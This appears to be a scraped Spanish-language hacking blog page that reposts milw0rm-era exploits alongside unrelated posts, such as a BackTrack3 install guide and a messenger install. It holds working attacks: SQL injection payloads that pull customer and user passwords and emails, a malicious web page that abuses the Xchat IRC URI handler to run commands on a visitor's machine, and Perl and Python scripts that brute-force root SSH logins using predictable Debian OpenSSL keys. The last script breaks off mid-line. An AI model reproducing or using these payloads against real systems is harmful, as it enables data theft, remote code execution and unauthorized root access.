kernelpanic.org.mx

## AUTHOR : JuDge

## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com

## Script WebSite:http://www.eshop100.co.uk

##Dork::)

##DescRipTiON: pull customers info from database

##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/

0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1

/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,

18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: “AcmlmBoard v1.A2″
#
##
###
##
#
#This Board Software suffers from some not correctly verified variables which are used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,

9,10,11,12,13,14,15,16%20from%20users–+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################

Kid Rock ha publicado un video en YouTube, donde invita a descargar ilegalmente música – o en sus propias palabras, a robar música.
Como si lo anterior no fuera suficiente, luego exhorta al público a robar todo lo que se le antoje; automóviles, gasolina, música y películas. “Todo lo que necesites”.

aqui al link: KID ROCK –> roba todo lo que puedas

Hola que tal, navegando ayer por el foro de elhacker me encontré esta guía para los novatos o como el titulo lo dice para un wuindulero =) bueno e aquí el link

Una Guia Linuxera, Para un Windolero

Primero que nada tienes que tener lla echa una particion. Con 4 GB es mas que suficiente. Corremos el live cd de bactrack3 y abrimos una shell y comenzamos

bt~#mkdir /mnt/backtrack3 —> creamos una carmeta dentro /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ –> montamos la particion donde queremos instalar /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ —> creamos otro directorio
bt~#cp –preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack/ —> instalamos tardara unos minutos

####—-> despues de que termine con la instalacion terminamos con esto. ———–####

bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount –bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/

Para agregarlo al grub en mi cas solo edite el archivo menu.lst de mi debian.

bt ~ # fdisk -l

Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux

Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS

como podran ver fue en la /dev/sda10 donde instale el back|track3
entonses:

Entre en el archivo menu.lst de debian y lo edite

#nano /boot/grub/menu.lst

title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro

con eso fue mas que suficiente para tener back|track3 en mi HD.

aqui el link para descargar BACK|TRACK3

emsn es un cliente de mensageria similar al msn. la verdad en lo personal aun prefiero pidgin pero pues siempre hay mas altertativas que probar.

Primero editamos nuestro sources.list

#pico /etc/apt/sources.list

Y agregamos los repos.

deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./

haora.

#apt-get update

y haora instalamos.

#apt-get install emesene

Y listo.

#################################################

#################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approch is a bit different.
# We don’t use any % or ../../../ as the others related bugs, just a single ”
# According to the registry , when the IRCS:// URI is called , the command launched is :
# C:\Program Files\xchat\xchat.exe –existing –url=”%1″
#
# The xchat –help option tells us :
# ” –command=COMMAND :Send a command to existing xchat ”
#
# So we add a simple ” at the end of the URL and we’re in business ?
# Yep =) ircs://blabla@3.3.3.3″ –command “shell calc”
#
# Note: The victim needs to be connected to an irc server , and also need IE * .
#
#
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# “If in times like theses you can talk about individual freedoom, you’re propably a terrorist”
#
# Poc: this only launch the calc, sky is the limit passed this point.

html
head title Welcome to my personal website /title /head
body
script document.location=’ircs://blabla@3.3.3.3″ –command “shell calc”‘/script
/body
/html

###http://www.milw0rm.com/#####

dandome unas visitas por milworm encontre :

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

the debian openssl issue leads that there are only 65.536 possible ssh

keys generated, cause the only entropy is the pid of the process

generating the key.

This leads to that the following perl script can be used with the

precalculated ssh keys to brute force the ssh login. It works if such a

keys is installed on a non-patched debian or any other system manual

configured to.

On an unpatched system, which doesn’t need to be debian, do the following:

keys provided by HD Moore – http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2

http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048

Bits, generated on an upatched debian (this is the key this exploit will

break)

4. Run the perl script and give it the location to where you extracted

the bzip2 mentioned.

#!/usr/bin/perl

my $keysPerConnect = 6;

unless ($ARGV[1]) {

print “Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n”;

print “Example: ./exploiter.pl /root/keys/ 127.0.0.1\n”;

print “By mm@deadbeef.de\n”;

exit 0;

}

chdir($ARGV[0]);

opendir(A, $ARGV[0]) || die(“opendir”);

while ($_ = readdir(A)) {

chomp;

next unless m,^\d+$,;

push(@a, $_);

if (scalar(@a) > $keysPerConnect) {

system(“echo “.join(” “, @a).”; ssh -l root “.join(” “, map { “-i

“.$_ } @a).” “.$ARGV[1]);

@a = ();

}

}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,

Markus Mueller

mm@deadbeef.de

# milw0rm.com [2008-05-15]

Y TAMBIEN

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

#!/bin/python

# This program is free software; you can redistribute it and/or modify

# it under the terms of the GNU General Public License as published by

# the Free Software Foundation; either version 2 of the License, or

# (at your option) any later version.

#

# This program is distributed in the hope that it will be useful,

# but WITHOUT ANY WARRANTY; without even the implied warranty of

# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

# GNU General Public License for more details.

#

# You should have received a copy of the GNU General Public License

# along with this program; if not, write to the Free Software

# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,

# MA 02110-1301, USA.

############################################################################

# Autor: hitz – WarCat team (warcat.no-ip.org)

# Collaborator: pretoriano

#

# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2

# http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

#

# 2. Extract it to a directory

#

# 3. Execute the python script

# – something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5

# – execute: python exploit.py (without parameters) to display the help

# – if the key is found, the script shows something like that:

# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121

# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240

############################################################################

import Queue

import os

import string

import time

from threading import Thread

import sys

#This class only has a boolean, which will be True if some thread find the key

class End():

def __init__(self):

self.end = False

def Finish(self):

self.end = True

def GetEnd(self):

return self.end

#This is the thread class

class Connection(Thread):

def __init__(self,QueueDir,TheEnd,dir,host,user,port=’22′):

Thread.__init__(self)

self.QueueDir = QueueDir

self.TheEnd = TheEnd

self.dir = dir

self.host = host

self.user = user

self.port = port

def run(self):

while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):

key = self.QueueDir.get()

cmd = ‘ssh -l ‘ + self.user

cmd = cmd + ‘ -p ‘ + self.port

cmd = cmd + ‘ -o PasswordAuthentication=no’

cmd = cmd + ‘ -i ‘ + self.dir + ‘/’ + key

cmd = cmd + ‘ ‘ + self.host + ‘ exit; echo $?’

pin,pout,perr = os.popen3(cmd, ‘r’)

pin.close()

#To debug descoment the next line. This will show the errors reported by ssh

#print perr.read()

if pout.read().lstrip().rstrip() == ’0′:

self.TheEnd.Finish()

print ”

print ‘Key Found in file: ‘+ key

print ‘Execute: ssh -l%s -p%s -i %s/%s %s’ %(self.user,self.port,self.dir,key,self.host)

print ”

print ‘\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org’

if len(sys.argv) < 4:

print ‘./exploit.py